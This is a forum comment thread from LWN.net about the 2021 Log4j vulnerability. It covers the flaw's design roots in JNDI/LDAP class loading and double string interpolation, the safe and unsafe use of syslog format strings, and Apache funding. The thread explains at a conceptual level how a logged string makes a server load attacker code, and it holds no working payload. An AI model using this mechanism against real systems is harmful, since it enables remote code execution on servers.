The Log4j mess [LWN.net]

The Log4j mess

Posted Dec 12, 2021 19:05 UTC (Sun) by alonz (subscriber, #815) [Link]

This already ruined the weekend for many folks in the industry (myself included).

The Log4j mess

Posted Dec 12, 2021 19:24 UTC (Sun) by tome (subscriber, #3171) [Link] (43 responses)

This is one of the most simple and obvious vunerabilities I've ever seen. To spot it one doesn't even have to read the flawed code that implements it. The Log4j documentation has everything you need to know to craft an exploit. But 'craft' is really too strong a word here, because the poison request can be sent raw, undiguised by trojan decoration. If sent to a server that logs requests with Log4j, it'll fetch code from your LDAP server and run it with the same privileges as the application server you're attacking.

It's like Dennis Leary's one-liner: "Lou Gehrig died from Lou Gehrig's disease -- how did he not see that coming?"

The Log4j mess

Posted Dec 12, 2021 21:02 UTC (Sun) by roc (subscriber, #30627) [Link] (2 responses)

Given that the vulnerability is apparent once you understand the feature --- why wasn't it identified earlier? Seems like lots of people had enough information to identify the problem. Interesting food for thought.

The Log4j mess

Posted Dec 13, 2021 1:48 UTC (Mon) by Cyberax (✭ supporter ✭, #52523) [Link]

It's a low-level library that normally "just works", and people use it without giving it a second thought. It's not even similar to something like OpenSSL, because it doesn't deal with Internet-facing complicated protocols.

The Log4j mess

Posted Dec 13, 2021 5:10 UTC (Mon) by raven667 (subscriber, #5198) [Link]

The ideas behind this became well known when printf format string issues were publicized but I saw a few references to presentations at Blackhat 2015 and 2016 that provide all the knowledge needed, someone just had to do the actual work to figure out this applied to log message templating and publish it.

https://portswigger.net/research/server-side-template-inj...
https://www.blackhat.com/docs/us-16/materials/us-16-Munoz...

The Log4j mess

Posted Dec 12, 2021 21:34 UTC (Sun) by tialaramex (subscriber, #21167) [Link] (31 responses)

As I understand it, it's also very clumsy engineering. Log4j doesn't, even now, seem to understand the difference between the log message format and the formatted log message.

When this "feature" still existed by default in the library, their documentation (I looked at the Wayback Machine entry in November) seems pretty cheerful about it, even extolling the virtues of recursive lookups since hey, it's just a string, we can process it in a loop...

It's tempting when over-engineering something - as will inevitably happen for a second system like log4j2 was - to make everything that could possibly vary into a variable. Why not right? But the lesson we've learned in decades of Software Engineering is that constraint is actually good - yes I want to be able to make everything a variable if I need to, including whether everything is a variable, but that should not be the default, the default should be something much less free-form, needing me to explicitly opt into ever crazier Alice-in-wonderland APIs when and if I need them, which usually I won't.

Imagine if 99.9% of the world's log4j usage was calling log("Only this format is special", these, parameters, are, not, parsed); Unable to change constant strings like "Only this format is special" and "Username {} not present in database" lots of possible attack paths are stopped dead.

Sure, the 0.1% of the world that actually needed log_special(all, these, parameters, are, parsed); or log_array(array_of_parameters) is in a panic to fix their code, and it is at least possible that some of this 0.1% is exposed somewhere it really shouldn't have been, but the people being exposed at least got some value for what they risked.

The Log4j mess

Posted Dec 12, 2021 23:33 UTC (Sun) by bartoc (guest, #124262) [Link] (30 responses)

I think you are mostly correct here. It's the same insight that tcl has with respect to it's substitution behavior (it never double expands), and the same bug that makes bash injection so easy (unless you turn off this somewhat surprising behavior by setting IFS to nul).

I don't think splitting things into a format string + arguments form is necessary to prevent stuff like this though, only that that form makes the problematic behavior seem much more insane than doing it in the "everything is one string" form.

Consider SQL injection: "SELECT ${some_variable} FROM my_table;". The problem here is not that the replacement ("${some_variable}") is inside the string instead of after it (passed as a parameter) but that there's two parsers that process the string one after another, the language's "string interpolation" parser and then the actual SQL parser. The first parser eliminates the information that "${some_variable}" is one unique "thing" that should be expanded verbatim, so the second one has no way of knowing not to parse its content as commands.

If the logging "formatter" and the string interpolation "formatter" are actually the same library then this need not occur, the parser can just expand the replacement and do no other work. This does mean you need to say "log("${user_string}")" instead of "log(user_string)" though, so having the printf style API may still be less error prone (note that you do need the ability to directly parse and log runtime format specifications because it's useful for localization).

My preference is: never double expand, and require a special opt-in for passing non-constant format specification strings.

The Log4j mess

Posted Dec 13, 2021 3:23 UTC (Mon) by njs (subscriber, #40338) [Link]

> If the logging "formatter" and the string interpolation "formatter" are actually the same library then this need not occur, the parser can just expand the replacement and do no other work

I think this is exactly how this happened -- log4j uses two different pre-existing libraries to interpolate variables from the log event and to interpolate lookup keys. Since interpolation doesn't compose, they just ran them one after the other. And if they'd run them in the opposite order, they'd have mostly gotten away with it -- but whoever wrote that code didn't realize the danger, and lost the coin flip about which order to put them in.

The Log4j mess

Posted Dec 13, 2021 4:47 UTC (Mon) by rlhamil (guest, #6472) [Link] (3 responses)

Yes! If something is subjected to two or more different parsings, there's the possibility of supplying a parameter or input that takes advantage of that.

That's one reason I double quote just about every shell variable substitution (even if I'm pretty sure it can't matter), and think very carefully about what "eval" might do. :-)

The Log4j mess

Posted Dec 13, 2021 6:29 UTC (Mon) by bartoc (guest, #124262) [Link] (2 responses)

just start your script with:

IFS=

it removes the recursive word expansion “feature” completely

The Log4j mess

Posted Dec 13, 2021 9:32 UTC (Mon) by NYKevin (subscriber, #129325) [Link] (1 responses)

Doesn't bash still do globbing even if IFS is empty? So setting IFS= is not going to save you from variables containing stars or question marks... which means you have to use double quotes everywhere *anyway*, which means you don't need to bother clearing IFS.

The Log4j mess

Posted Dec 13, 2021 23:24 UTC (Mon) by sjj (guest, #2020) [Link]

I've used this as the first code line.

set -efu -o pipefail

The Log4j mess

Posted Dec 13, 2021 9:49 UTC (Mon) by NYKevin (subscriber, #129325) [Link] (24 responses)

I would go further. The entire feature is ill-conceived and never should have been added, even with proper parsing discipline. Think about it: You're a *logging library*. Your job is to consume strings and push them into a file or networked logging service. If you want to let the client customize some aspect of how those strings are processed or formatted, the obvious way to do that is using the template method pattern, or something reasonably like the template method pattern. There is no universe in which it makes sense to try and parse URIs out of the strings and load arbitrary code over the network, just so the client can avoid having to write a tiny amount of glue code (for which you could easily provide convenience functions etc., if necessary).

Normally, I wouldn't be this blunt about it, but c'mon, people, the template method pattern was in the Gang of Four book in 1994. It's one of the most commonly used, well-understood design patterns in existence, to the point that some people wouldn't even call it a design pattern because it's "too obvious." This is in no way a difficult problem to solve, and I find it baffling that anybody reached for JNDI and LDAP to do so.

The Log4j mess

Posted Dec 13, 2021 11:15 UTC (Mon) by k3ninho (subscriber, #50375) [Link] (2 responses)

>[S]ome people wouldn't even call it a design pattern because it's "too obvious."
From the test side, 'obvious' is one of my trigger words. 'Should' is considered harmful; common sense is not so common.

It is worth making a habit of overstating safe and diligent behaviour, here calling out the options for logging: don't consume user/attacker input without putting it in a security zone; don't call out to the network without know what you're calling out to the network for; build your string before publishing it; ideally only use printf-type string substitution when logging. You don't need recursive descent or a state machine and it's a security hole waiting to happen if your logger is functionally a Turing-Complete Domain-Specific Language.

On top, I think we ought to look at the wider culture around Enterprise Java (as I understand it) that uses a lot of instantaneous point-of-use anonymous functions in the Java 8 streams modality. This means programmers are trained away from instantiating and using items outside an anonymous lambda on composed object methods, so being able to log some data might just in-line process user-/attacker-supplied input.

K3n.

The Log4j mess

Posted Dec 13, 2021 15:41 UTC (Mon) by NYKevin (subscriber, #129325) [Link] (1 responses)

> On top, I think we ought to look at the wider culture around Enterprise Java (as I understand it) that uses a lot of instantaneous point-of-use anonymous functions in the Java 8 streams modality. This means programmers are trained away from instantiating and using items outside an anonymous lambda on composed object methods, so being able to log some data might just in-line process user-/attacker-supplied input.

In other words: Java (or "Enterprise Java" if you prefer) has successfully ship-of-Theseus'd itself into a language whose programmers don't know OOP. That's a startling outcome of this whole streams business, when you consider that Java was originally designed to force programmers to use OOP whether they like it or not.

The Log4j mess

Posted Dec 13, 2021 21:42 UTC (Mon) by khim (subscriber, #9252) [Link]

> when you consider that Java was originally designed to force programmers to use OOP whether they like it or not.

This may have been the original intent, but Java, eventually, became a language who's true strength lies in the ability to use programmers who don't know anything about OOP or even programming in general and program by copy-pasting snippets from Stack Overflow randomly till tests pass.

Of course when language started adding features which are easy to abuse that fact become exposed.

But it's not if Java programmers understood what they are doing and why before introduction of Streams.

The Log4j mess

Posted Dec 13, 2021 11:42 UTC (Mon) by Cyberax (✭ supporter ✭, #52523) [Link] (7 responses)

The problem is that people involved hadn't understood that connecting two seemingly unrelated features might result in a disaster.

First, the JNDI lookup causing class loading is fine, it's typically used in enterprise networks to connect clients to an application server (typically over a trusted network) or to do service discovery within the application environment. These days we would think about man-in-the-middle pretending to be the app server and injecting malicious payload, but people were not considering this back then.

Second is using JNDI lookups in the format string. Format strings are typically not controlled by attackers and there's no reason for the library author to be too concerned about supporting JNDI.

And the third is using that with raw log messages.

A typical Swiss cheese model of a disaster.

The Log4j mess

Posted Dec 13, 2021 17:23 UTC (Mon) by NYKevin (subscriber, #129325) [Link] (6 responses)

> Second is using JNDI lookups in the format string. Format strings are typically not controlled by attackers and there's no reason for the library author to be too concerned about supporting JNDI.

Sure, but the client could do that themselves. For example (and I'm just making this syntax up, it could obviously be more elaborate if necessary), Log4j could say "If the format string contains a substring of the form {custom:foo}, we will call the formatCustomReference() method [or whatever they decide to name it] and pass the string 'foo' as the only argument, then replace {custom:foo} with whatever that method returns." Then, *if you want JNDI lookups*, you override the method with code that does a JNDI lookup (or call their convenience method/use their pre-written class which does that for you). If you don't want JNDI lookups, you don't override XYZ, and the default implementation either returns the string unchanged, or throws.

My argument here is that the vast majority of the time, you don't actually need to do arbitrary class lookups at runtime. Often, you just want some random little bit of state that happens to be inconvenient to pass directly into the logging call... so you can pull it out of some kind of context class or something like that. JNDI is basically reflection, and it should be a last resort, not the default way of solving the "I need to run some code" problem.

The Log4j mess

Posted Dec 13, 2021 19:05 UTC (Mon) by NYKevin (subscriber, #129325) [Link]

> you don't override XYZ

s/XYZ/formatCustomReference/

The Log4j mess

Posted Dec 13, 2021 22:14 UTC (Mon) by Cyberax (✭ supporter ✭, #52523) [Link] (3 responses)

That's pretty much what happened. Except that the JNDI lookup code was added to the default set of plugins.

Here's the patch: https://issues.apache.org/jira/secure/attachment/12592850... - note the plugin set in the beginning.

> My argument here is that the vast majority of the time, you don't actually need to do arbitrary class lookups at runtime.

There's no arbitrary lookup at runtime. E.g. you can't do something like "${nodejs:script}" and expect the JVM to dynamically class-load NodeJS.

The problem is in the JNDI implementation, it can be used to load arbitrary code. This is arguably a bad design in the first place, though.

The Log4j mess

Posted Dec 14, 2021 3:27 UTC (Tue) by rodgerd (guest, #58896) [Link]

Time to bust this baby out again: https://www.youtube.com/watch?v=kjZHjvrAS74

The Log4j mess

Posted Dec 14, 2021 8:12 UTC (Tue) by NYKevin (subscriber, #129325) [Link] (1 responses)

> There's no arbitrary lookup at runtime.

To my understanding, the way this CVE has been publicly described is (roughly) as follows:

0. A vulnerable implementation logs a user-provided string.
1. The string contains a URI.
2. Log4j uses some JNDI and LDAP magic to convert this URI into a Class<T> object, or something which at least vaguely resembles a Class<T> object. In so doing, it downloads the class definition from an attacker-controlled server.
3. Log4j then uses reflection to call some method on that Class<T> (or whatever it is), which causes attacker-controlled code to be executed.

I call step (2) "arbitrary class lookups at runtime." What do you call it, or is my understanding of this security vulnerability completely incorrect?

The Log4j mess

Posted Dec 14, 2021 8:26 UTC (Tue) by Cyberax (✭ supporter ✭, #52523) [Link]

> 2. Log4j uses some JNDI and LDAP magic to convert this URI into a Class<T> object, or something which at least vaguely resembles a Class<T> object. In so doing, it downloads the class definition from an attacker-controlled server.

Close. LDAP in Java has support for class loading, which was earlier (in the time of Java 1.2!) used to load type information data for things like custom exceptions or custom types. Doc: https://docs.oracle.com/en/middleware/idm/internet-direct...

LDAP is not the only vector that can be used to exploit this. RMI (Remote Method Invocation) is just as potent but is a bit harder to set up.

> 3. Log4j then uses reflection to call some method on that Class<T> (or whatever it is), which causes attacker-controlled code to be executed.
It actually doesn't use it for anything, but simply loading the class is enough (static initializers can run arbitrary code).

The Log4j mess

Posted Dec 14, 2021 10:11 UTC (Tue) by smurf (subscriber, #17840) [Link]

> Sure, but the client could do that themselves.

But that would … umm … require actual coding?

Given that Java devolved into a language of which 90% (personal and admittedly biased impression) consists of mostly-copied-from-stackoverflow boilerplate for iterator classes and instance-building classes and whatnot *plus* its own built-in scripting language (it's too difficult to hook anything sane into the JVM, so …), most Java coders won't be able to get that right.

So instead of a sane approach, which would have required an entirely new heap of class scaffolding just for the ability to pass a look-something-up object to the logger, they opted to do string interpolation. Of random data from outside. Patently stupid but let's face it the first step towards a _really_ sane solution involves "use a sensible language dammit".

The Log4j mess

Posted Dec 13, 2021 16:14 UTC (Mon) by epa (subscriber, #39769) [Link] (12 responses)

It's a characteristic weakness of open source, community-driven projects to make everything customizable, configurable, and dynamic. And this episode shows one advantage of crusty, rule-bound standards committees. If you have to write a formal specification of the behaviour, so that a new implementation could be written to the spec, design flaws become clearer. "First the following patterns in the string are expanded. Then the result of that expansion is taken as a new string to be expanded, using these different patterns... oh hang on..."

The Log4j mess

Posted Dec 13, 2021 22:27 UTC (Mon) by bartoc (guest, #124262) [Link] (11 responses)

I’m a C++ library implementer, so implementing these kinds of standards is my job

they do become clearer I guess, but many bugs still don't show up until you have actually gone to write the first implementation. A technical standard with zero implementations is a very different beast than one with one implementation, and thats different from one with multiple independent implementations.

Theres a reason the C++ committee likes to standardize existing libraries, and even then the resulting specification usually contains many bugs found only during implementation.

In any event I think going to a formal standardization model would be a very expensive way to resolve this, and if nobody else is going to implement the thing then you could just as well spend the time writing documentation for the current behavior (which is what a standard with one implementation written after the fact by that implementations authors is going to be in any case). Improving the documentation outside any formal process is probably better bang for the buck.

Maybe Knuth had a point with his whole “literate programming” thing after all :)

The Log4j mess

Posted Dec 14, 2021 13:23 UTC (Tue) by khim (subscriber, #9252) [Link] (10 responses)

> Maybe Knuth had a point with his whole “literate programming” thing after all :)

Wouldn't work. It's slow, but, more importantly, for it to work you need someone who may write good code and good documentation.

It's hard enough to find one who may do good job for one of these things. But to find someone who may do these two different things? Simultaneously?

Sorry, we need more than one coder per thousand (or ten thousand?) of people.

The Log4j mess

Posted Dec 14, 2021 13:52 UTC (Tue) by mathstuf (subscriber, #69389) [Link] (9 responses)

> Sorry, we need more than one coder per thousand (or ten thousand?) of people.

Hmm. This certainly warrants a citation. If you're referring to "societal demand" kind of "need", sure. But I'm not sure that turns into anything other than "the market will fulfill demand" with the normal head-in-the-sand behaviors to externalities if there's not some kind of guiding regulation (IMO, another "societal demand" kind of "need").

The Log4j mess

Posted Dec 14, 2021 15:28 UTC (Tue) by khim (subscriber, #9252) [Link] (8 responses)

Various estimated put number of software engineers in US somewhere between 2 million and 4 million.

That's around 1% of population. Which means that the 5% which may grasp the required knowledge naturally is, probably, enough: if ¼ or ⅕ would pick software engineering as their life goal we would have about 1% of population. But if we would take 5% from 5% (by adding the requirement to be proficient in another, significantly different area) then we would arrive at around 0.25% which is significantly lower than 1%. And some of them may want to do something else than programming, you know.

IOW: there are no excuse for the bazillions of Java programmers which copy-paste code from StackOverflow without understanding what they are doing, but asking the programmers to learn to write good literature on top of writing good code would be too much.

Maybe we may organize things differently and then 0.05% of population would be enough… but that would require entirely different organization of society and we have no idea if such society is possible at all.

The Log4j mess

Posted Dec 16, 2021 18:49 UTC (Thu) by fest3er (guest, #60379) [Link] (7 responses)

Alas, coders, programmers and software engineers will never produce quality documentation until teachers/instructors/professors learn to teach natural languages (English, Korean, Chinese, Russian, Italian, Bantu, et alia) as *programming* languages. Because that is what they are. Consider: as I type this response, I am attempting to code a program that, when you later read it, will program *your* neural nets to think what I am thinking.

I see little reason for any software engineer to be unable to code good, clear documentation. Programming is programming; natural languages and computer languages all demand rigorous attention to details in order to avoid errors. In short, if you can write well using computer languages, you should be able to learn to write well using English (as most programming languages use English) and your native language if it is not English, and you should be able to learn another natural language without too much difficulty.

All languages are programming languages and should be be taught as such. But I digress.

The Log4j mess

Posted Dec 16, 2021 19:11 UTC (Thu) by khim (subscriber, #9252) [Link]

Similarity between programming languages and natural languages is quite real but irrelevant.

“Programming” humans and programming computers are two radically different skill sets. That's why good managers are rarely good programmers and good programmers are rarely good managers.

Difference lies not in the languages used, but in the difference between computer and human. And that one is huge.

Humans have common sense yet couldn't keep in mind even dozen entities simultaneously. Computers have no common sense but could easily deal with millions and billions of entities.

This makes an art of making computer do what you need radically different from doing the same to a human. With computer there are no need to persuade anyone to do anything or keep anyone engaged or interested — but you have to handle corner-cases or else you would be in trouble. With humans you can rely on the fact that most corner cases would be noticed and fixed automatically but need to somehow convince someone to accept your “program”.

Consider lawyers (who are, arguably, closest to “human programmers”) vs programmers. What would programmer do when faced with the need to verify program? Test corner cases first. If program works fine there, then chances are high it would work fine everywhere. What lawyer does when faced with the need to interpret the law? Tries to move as far from corner cases as possible: you can never be sure how judge would interpret corner cases thus spending time on them is pointless, better to look for a way to resolve the case without touching any corner cases, even remotely.

And if you would try to use human languages like a programming language (and following DRY principle, trying to avoid text duplication and so on is the best way to create something which noone, not even other programmer, would be able to understand.

Because with computers you try to avoid duplication but for human-readable text it's important to do just the opposite: talk about the same thing from many different approaches in the hope that reader would be able to understand and accept at least one of them.

The Log4j mess

Posted Jan 14, 2022 16:18 UTC (Fri) by nix (subscriber, #2304) [Link] (5 responses)

> In short, if you can write well using computer languages, you should be able to learn to write well using English (as most programming languages use English) and your native language if it is not English, and you should be able to learn another natural language without too much difficulty

Oh yes, because natural languages and computer languages have exactly the same level of complexity. Oh wait no, natural languages are orders of magnitude more complex and vary along many more dimensions, with much less obvious internal coherence (the only actual rule is "must be an attractor in the space of languages instantiated by the learning systems in toddlers' heads when iterated for many generations", and nobody even knows how those incredible pieces of neural machinery work or what they do, or even the space of languages they could in theory produce or the dimensions along which those languages might vary). This couldn't be more different from how computer languages are designed. Really, most computer languages are so similar to each other (compared to the variability we see in natural languages) that it would be close to the truth to call them all very strange, restricted dialects of (mostly) English.

Everyone who is neurologically normal can learn at least one spoken language in the critical window in childhood. Not everyone can learn more outside that time, no matter how hard they try, and even those who do are very rarely as good at is as native speakers who learned in that window. And computer languages are textual, and that's not a language at all: it's a technological *encoding* of a language. Languages are spoken things (or, for the deaf, serially-visually-encoded things quite unlike any form of writing, processed using astonishingly similar machinery to the machinery used to process auditory language, often ending up using the exact same brain regions, repurposed bits of auditory cortex!). There is no spoken form of any computer language I am aware of: IMHO this alone is enough to disqualify them all as being remotely similar to natural languages.

The Log4j mess

Posted Jan 14, 2022 16:36 UTC (Fri) by Wol (subscriber, #4433) [Link] (4 responses)

Bear in mind languages re-program the brain. Someone else has already mentioned tonal languages.

But even just French and English - French has a bunch of rules about where and how to stress the syllables. English doesn't. So as an English speaker when somebody talks to me with a different stress pattern I take it in my stride. But if I spoke French with an English stress pattern, a Frenchman would find it much harder to understand than if I spoke with a French stress pattern, despite being the EXACT SAME syllables (or rather not, as consonants migrate freely between English syllables).

If your brain is programmed to recognise one class of languages, it is very difficult to be competent in a different class. And even multi-lingual kids - a study of children with one French and one English parent found that all the kids fell on one side or the other of this divide, and it clearly affected their choice of favourite language, even if they were perfect in the other.

Cheers,
Wol

The Log4j mess

Posted Jan 14, 2022 16:48 UTC (Fri) by nix (subscriber, #2304) [Link] (2 responses)

> But even just French and English - French has a bunch of rules about where and how to stress the syllables. English doesn't.

Yes it does. It just has different rules (it's incredibly hard to understand mis-stressed English and sometimes it can be incomprehensible or change the meaning entirely, just as in French). What English has mostly lost is the need for endings of, well, almost anything but pronouns to agree in number, case etc (an ancient feature present in almost all other PIE-descended languages).

The Log4j mess

Posted Jan 14, 2022 21:40 UTC (Fri) by Wol (subscriber, #4433) [Link] (1 responses)

That's fine until you get conflicting rules in different dialects. I've just got used to it ...

And then you get wonders like "how do you pronounce Gillingham?" Where the correct answer is "What county are you in?". I pronounce it Jillingham, which is the gramatically correct way? The i softens the g? The way of the Men of Kent? (No, Kentish Men don't live in Gillingham.)

And then I went to Somerset, where they pronounce it G'illingham, like Google Maps. Very confusing :-)

My daughter's now a Yorkshire lass with Geordie in-laws. That gets well weird ...

Give up. English is a STRANGE language (and that's *before* the Americans started messing with it :-)

Cheers,
Wol

The Log4j mess

Posted Jan 15, 2022 1:45 UTC (Sat) by mathstuf (subscriber, #69389) [Link]

> I pronounce it Jillingham, which is the gramatically correct way? The i softens the g?

I don't think that's any hard and fast rule. Take "gill" (as in fish breathing organs) for example. I'm American, but I'd pronounce that with a hard "g" without any other guidance.

The Log4j mess

Posted Jan 14, 2022 17:24 UTC (Fri) by mathstuf (subscriber, #69389) [Link]

> Bear in mind languages re-program the brain.

I don't believe the Sapir-Whorf hypothesis has been proven enough to state it with such conviction. At least this sounds like the strong version (whereas the weaker version where it merely *influences* is much better supported).

> Someone else has already mentioned tonal languages.

English has tones. Not in the same way as Chinese or Telugu, but it's there. Just as an example, verbal sarcasm is (usually) expressed through tonality. Take "yeah, right" (agreement) and "yeah…right" (doubt) when said verbally. The only difference is tone and timing. English also has tones associated with questions and interrogatory statements (try asking questions flatly or adding a rising tone to the end of sentences). The tonality is more on the level of sentences rather than on syllables, but I don't think anyone can say with conviction that English is completely atonal and therefore is not something completely alien to English speakers. It's just used differently (with a higher level of importance).

FWIW, Hindi has aspiration on basically every consonant sound which makes it different (and therefore changes the word). It is *very* hard for me to make some of them as it just doesn't feel natural and I feel like I'm making a separate "h" sound, but I (think I) am getting better at hearing them. I suspect it is similar for the English l/r distinction that is difficult for native speakers of some languages. Rolling or trilling r sounds is also something I have just not been able to master either. Tones in other languages feel more like this to me than something impossible.

The Log4j mess

Posted Dec 13, 2021 8:24 UTC (Mon) by Lawless-M (guest, #155377) [Link]

Yeah, I just read the way it worked, and my reaction was "are the people who thought of feature 'mental' ?"

The Log4j mess

Posted Dec 14, 2021 13:52 UTC (Tue) by dskoll (subscriber, #1630) [Link] (6 responses)

Yes, it was a real WTF of a design error. Even venerable old syslog(3) has been abused due to the naivety of programmers who write:

syslog(LOG_INFO, attacker_controlled_msg);

instead of:

syslog(LOG_INFO, "%s", attacker_controlled_msg);

If I could go back in time, I'd redesign syslog(3) to take only a single string argument that is logged verbatim, and add a new syslogf(3) function that does implements the formatted version.

The Log4j mess

Posted Dec 14, 2021 23:43 UTC (Tue) by NYKevin (subscriber, #129325) [Link] (5 responses)

I would go further. IMHO there are basically two cases:

1. You need interpolation. Then there should actually be at least one string interpolation command somewhere in the format string, and so you need at least two arguments (the format string and whatever argument the first interpolation takes).
2. You don't need interpolation. Then you should either be writing printf("%s", x) (or whatever printf-like function you're calling instead of printf), or you should be using a convenience wrapper that does that for you. Therefore, you *still* need at least two arguments to printf.

If those two cases were the only two cases that we cared about, then we could just ban one-argument printf (and printf-likes) altogether (e.g. using a lint rule).

Unfortunately, there's a third case:

3. You are dynamically building a format string which may or may not actually contain any interpolation commands.

You could keep track of whether you've added an interpolation as you build the string, and then select case (1) or case (2) at runtime. On first blush, this looks like needless and pedantic bookkeeping, but as it turns out, C variadics are so bad that you already have to do that anyway (or something just as verbose and ugly, involving a partial va_copy of an existing va_list, such that the copy can dynamically be empty or non-empty). So case (3) basically doesn't exist, unless you are working in an environment or language where variadics are not C-like, at which point you can probably do runtime checking of whether the number of arguments passed matches up with the number implied by the format string.

The only exception to this would be if your API takes a format string and a C array, but no size argument. Such APIs have never been typical for printf-like functions, because the caller would have to allocate and initialize an array, take pointers to all of the arguments, cast everything into pointer-to-void, etc. and nobody wants to do that just to print a string. So I'm perfectly happy to declare that case as "You made the weird API, now you get to live with its shortcomings."

The Log4j mess

Posted Dec 15, 2021 17:43 UTC (Wed) by dskoll (subscriber, #1630) [Link] (4 responses)

I don't think the third case is worth supporting for a logger, but if someone wants to, then the logical name would be vsyslogf(), analogous to vfprintf().

My point is that the name syslog doesn't alert a programmer to the fact that the function takes printf-like format strings, whereas syslogf is more likely to.

The Log4j mess

Posted Dec 15, 2021 20:09 UTC (Wed) by NYKevin (subscriber, #129325) [Link]

Note that vfprintf() takes a va_list, not an array. You cannot dynamically allocate and initialize va_list objects (at least, using standard portable C, anyway), so even vfprintf() does not actually support this use case in a reasonable fashion (because there would be no way to dynamically determine the arity at runtime). As I briefly alluded to, you can use va_arg (not va_copy, although that does preserve the truncation) to shorten a va_list by truncating elements from left to right, which in theory could be used to build a va_list of fixed (statically determined) types and with a static maximum arity, but that's not really adequate for the general case. This is what I mean by "C variadics are terrible."

The Log4j mess

Posted Dec 17, 2021 16:55 UTC (Fri) by ianmcc (subscriber, #88379) [Link] (2 responses)

Why do interpolation at the same time as writing to the log? Wouldn't it be more sensible to separate out those tasks and if you want interpolation then spell it like syslog(LOG_INFO, format("%s", attacker_controlled_msg)) ? (Yes its too late for syslog(3), but in new code....)

The Log4j mess

Posted Dec 20, 2021 17:50 UTC (Mon) by jezuch (subscriber, #52988) [Link]

In short: performance. You don't want to pay the price of formatting the message if it isn't going to be used because (for example) the log is of too low priority (generally you want to have lots of DEBUG logs which are turned off by default - making this cheap is important) (making it convenient is also important - you could check each time if the log level is enabled, but it's extremely annoying and ugly as hell)

So in effect the modern logging frameworks take the format string and arguments instead of pre-formatted message, and some static analysis tool will scream at you if you don't use them.

The Log4j mess

Posted Jan 3, 2022 12:24 UTC (Mon) by immibis (subscriber, #105511) [Link]

It's C. What kind of value is format going to return?

The Log4j mess

Posted Dec 12, 2021 19:26 UTC (Sun) by flussence (guest, #85566) [Link] (8 responses)

Enterprise is learning, in the most deserved way, that there's no free lunch. Pay the underfunded hobbyists your business relies on, or you'll end up paying for your negative externalities a different way.

The rest of us are going to have to live with jndi spam in our error logs for *months* now...

Apache Log4j

Posted Dec 12, 2021 21:53 UTC (Sun) by tialaramex (subscriber, #21167) [Link] (7 responses)

The full name of the project is Apache Log4j

As you will know, Apache promotes the Apache Way, including Responsible Oversight which ensures problems like this don't happen. Its Platinum sponsors pay at least $125k per year and its total fundraising brings in several million dollars. Hardly a "free lunch".

Apache Log4j

Posted Dec 12, 2021 23:48 UTC (Sun) by k8to (guest, #15413) [Link] (3 responses)

Despite this, log4j has been a mostly unmaintained ball of hair for the past 13 years at least. I have had to explain to "enterprise" customers that the bugs they were suggesting were my company's fault were entirely inside the log4j package they were using. Sometimes those bugs would even get fixed, but then not deployed properly for years. Sometimes they would just never get fixed.

Apache Log4j

Posted Dec 12, 2021 23:49 UTC (Sun) by k8to (guest, #15413) [Link]

If unclear, the customer was using log4j, not us.

Apache Log4j

Posted Dec 14, 2021 9:35 UTC (Tue) by taladar (subscriber, #68407) [Link] (1 responses)

I think the problem is largely that Java Open Source projects and Enterprise Open Source projects in general are often the result of unbearable pain at some employer that people then fix by writing some library in their free time because their employer is too cheap to do it properly on the clock. Obviously that same Enterprise employer is then also too cheap to pay for maintenance of the code. At some point the good programmer leaves the bad employer and has no need for the code any more so it goes unmaintained, especially for boring solutions to boring problems written in boring languages.

Apache Log4j

Posted Dec 16, 2021 9:07 UTC (Thu) by nim-nim (subscriber, #34454) [Link]

It’s not a problem in the Open Source part, it’s a generic problem in *Enterprise* software.

In *Enterprise* software the interactions between participants are mediated by contracts and licenses that effectively prevent fixing software the natural way. Thus the main “feature” of Enterprise software is inventing setups that allow executing new code without invoquing past contracts.

As the commit that added the problemaic feature to Log4j states, its for the “convenience” of not changing things were they belong, stupid.

Java and the Apache foundation (that is mostly Enterprise-oriented Java software, despite using a non-Java software front) were the poster child of this kind of development process. They were and are deeply hostile to free sofware because you just don’t fix things upstream, you find ways to workaround locally using things like JNDI or its modern equivalents. Of course they’ve lost a lot of their shine in the past years now that someone needs to process the accrued technical debt (besides the inefficiencies crushed the ecosystem, with a single remaining vendor for Hadoop & friends).

And if you think non-Open-Source Java development is any different than the one you see Apache foundation side I have prime real estate on the moon to sell you.

(the static linking/containerish guys are mostly the same crowd using new languages to make the same mistakes, in a decade or so they’ll be all over CERT bulletins fixing the technical debt they’re bosy creating right now).

Apache Log4j

Posted Dec 12, 2021 23:51 UTC (Sun) by flussence (guest, #85566) [Link] (1 responses)

Apache also promotes OpenOffice, so it calling itself "Responsible" in this context is only slightly more believable than if Amazon or BP did it.

Setting up an obfuscatory bureaucracy and calling it "open source" is a very effective way to keep large sums flowing laterally into certain pockets. With sums like that flying around over software that can't even charitably be described as in palliative care, never mind maintenance mode, some people absolutely are getting free lunch - at a very fancy restaurant.

This does not include Log4j2's actual developers, who — according to half the internet examining actual breakdowns of where that money goes, and also what they themselves have said in the frustration of having an angry mob yelling directly at them — are completely unpaid for all this apart from three (3) people donating to them on tip jar sites.

I hope someone loses a billion dollars from this.

Apache Log4j

Posted Dec 13, 2021 0:23 UTC (Mon) by mathstuf (subscriber, #69389) [Link]

> I hope someone loses a billion dollars from this.

Emphasis on the "one". If the pain is too spread out, we'll just find ourselves in another tragedy of the commons situation where no one single entity is willing to step up from "well, why me and not anyone/everyone else?".

Apache Log4j

Posted Dec 14, 2021 10:19 UTC (Tue) by smurf (subscriber, #17840) [Link]

> including Responsible Oversight which ensures problems like this don't happen

Excuse me while I fall off my chair, laughing madly.

This would be slightly more believable if a wet fart of the money the Apache Foundation rakes in every year actually went to the people responsible for maintaining all that software under its umbrella. Particularly when it's a central piece of infrastructure.

Well … apparently it was not possible to learn anything from the openssl mess. So we have to repeat it. (Only worse.)

The Log4j mess

Posted Dec 12, 2021 21:38 UTC (Sun) by nickodell (subscriber, #125165) [Link] (4 responses)

Worth noting that someone has posted a utility which can live patch out the vulnerable Log4j feature, without restarting any java processes.

Link: https://github.com/corretto/hotpatch-for-apache-log4j2

The Log4j mess

Posted Dec 13, 2021 14:20 UTC (Mon) by nix (subscriber, #2304) [Link] (3 responses)

Oh great! This means I can fix my unifi controller without being forced to upgrade it (in the last few years, every single controller or firmware update from unifi has broken something: small if you're lucky, total-bricking if you're not).

The right thing to do is decommission all my unifi stuff so I can stop running this horrible controller, but I've been putting that off for years... and at least this means people can't own my machines by just getting the controller to log something (which is amazingly easy for a remote attacker to do -- say, from outside the house).

The Log4j mess

Posted Dec 14, 2021 12:48 UTC (Tue) by nye (subscriber, #51576) [Link] (2 responses)

